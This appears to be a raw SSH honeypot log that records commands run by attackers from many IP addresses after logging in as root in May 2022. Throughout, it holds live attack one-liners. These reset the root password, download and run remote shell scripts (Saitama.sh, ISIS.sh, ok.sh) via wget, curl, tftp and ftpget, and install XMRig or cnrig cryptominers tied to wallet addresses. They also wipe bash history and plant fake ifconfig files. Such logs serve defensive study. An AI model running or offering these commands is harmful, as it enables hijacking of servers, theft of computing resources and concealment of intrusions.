echo root:dgtij26jti5u5ji6rgg755431|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 179.43.142.180 21-May-2022 20:06:18 ssh2 root Exec echo root:dgtij26jti5u5ji6rgg7554313|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij26jti5u5ji6rgg7554313|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 179.43.142.180 23-May-2022 04:54:55 ssh2 root Exec echo root:dgtij26jti5u5ji6rgg73554313g3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij26jti5u5ji6rgg73554313g3|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 31.11.112.117 23-May-2022 12:58:18 ssh2 root w nproc lscpu w ls -a cd /home ls ls -a cat .bash_history cd ls ls -a cat .bash_history cat .bashrc history -c ls uname -a cat /etc/issue passwd password passwd apt-get install passwd apt-get install glibc.i686 update apt-get install update passwd passwd update apt-get update wget http://49.212.165.107/img/.a/a.tgz tar -xf a.tgz rm -rf a.tgz perl a.pdf rm -rf a.pdf history -c' curl apt-get install curl curl curl - o From 179.43.142.180 23-May-2022 13:03:04 ssh2 root Exec echo root:dgtij26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij26jti5u5ji6rgg73554313gg3|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA curl https://www.getpagespeed.com/files/centos6-eol.repo --output /etc/yum.repos.d/CentOS-Base.repo clear exit From 179.43.142.180 23-May-2022 13:10:17 ssh2 root Exec echo root:dgtij26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij26jti5u5ji6rgg73554313gg3|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 179.43.144.210 23-May-2022 14:49:08 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://2.56.59.196/Saitama.sh; curl -O http://2.56.59.196/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 2.56.59.196 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 2.56.59.196; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf * cd /tmp cd /var/run cd /mnt cd /root cd / wget http://2.56.59.196/Saitama.sh curl -O http://2.56.59.196/Saitama.sh chmod 777 Saitama.sh sh Saitama.sh tftp 2.56.59.196 -c get tSaitama.sh chmod 777 tSaitama.sh sh tSaitama.sh tftp -r tSaitama2.sh -g 2.56.59.196 chmod 777 tSaitama2.sh sh tSaitama2.sh ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh sh Saitama1.sh rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh rm -rf * From 139.59.21.115 23-May-2022 14:56:40 ssh2 root Exec uname -a ; nproc uname -a nproc From 85.202.169.117 23-May-2022 19:26:13 ssh2 root Exec wget 194.31.98.205/x86_64; chmod 777 x86_64; ./x86_64 wns.x86 wget 194.31.98.205/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 From 103.161.17.72 25-May-2022 12:30:38 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://103.161.17.72/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 103.161.17.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://103.161.17.72/ISIS.sh chmod 777 * sh ISIS.sh tftp -g 103.161.17.72 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 103.105.12.48 25-May-2022 22:46:22 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 103.90.177.102 25-May-2022 22:58:47 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 103.152.37.54 25-May-2022 22:59:13 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 106.126.14.181 25-May-2022 23:04:39 ssh2 root Exec cd /tmp ; rm -rf ok.sh wget 156.38.209.136/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 156.38.209.136/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 156.38.209.136/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history cd /tmp rm -rf ok.sh wget 156.38.209.136/ok.sh sh ok.sh rm -rf ok.sh curl -O 156.38.209.136/ok.sh sh ok.sh rm -rf ok.sh history -c wget 156.38.209.136/cnrig chmod 777 cnrig ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 185.55.64.228 25-May-2022 23:16:55 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 209.216.177.158 25-May-2022 23:20:38 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 43.242.247.139 25-May-2022 23:30:14 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig From 222.187.196.26 26-May-2022 00:11:57 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 2.197.115.147 26-May-2022 00:17:28 ssh2 root PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 90.119.54.66 26-May-2022 00:25:29 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 183.213.26.13 26-May-2022 00:29:22 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 61.84.162.66 26-May-2022 00:36:09 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 223.171.91.146 26-May-2022 00:37:29 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 210.14.135.2 26-May-2022 00:39:52 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 210.14.135.2 26-May-2022 00:43:38 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 124.222.13.124 26-May-2022 00:45:28 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 123.132.238.210 26-May-2022 00:54:36 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 84.121.59.55 26-May-2022 00:59:32 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 150.107.95.20 26-May-2022 01:04:16 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 122.233.158.0 26-May-2022 01:16:59 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 136.52.6.221 26-May-2022 01:28:02 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 117.80.212.33 26-May-2022 01:30:01 ssh2 root echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 188.78.252.28 26-May-2022 01:32:10 ssh2 root echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 121.200.53.148 26-May-2022 01:48:28 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 223.171.91.169 26-May-2022 01:49:40 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 117.54.14.169 26-May-2022 01:50:14 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 62.171.164.101 26-May-2022 01:53:06 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 103.152.118.20 26-May-2022 01:54:16 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 92.205.21.38 26-May-2022 01:54:42 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 40.87.11.253 26-May-2022 02:01:09 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 188.75.153.218 26-May-2022 02:05:00 ssh2 root echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 43.242.247.139 26-May-2022 02:23:49 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 223.171.91.163 26-May-2022 02:47:41 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > 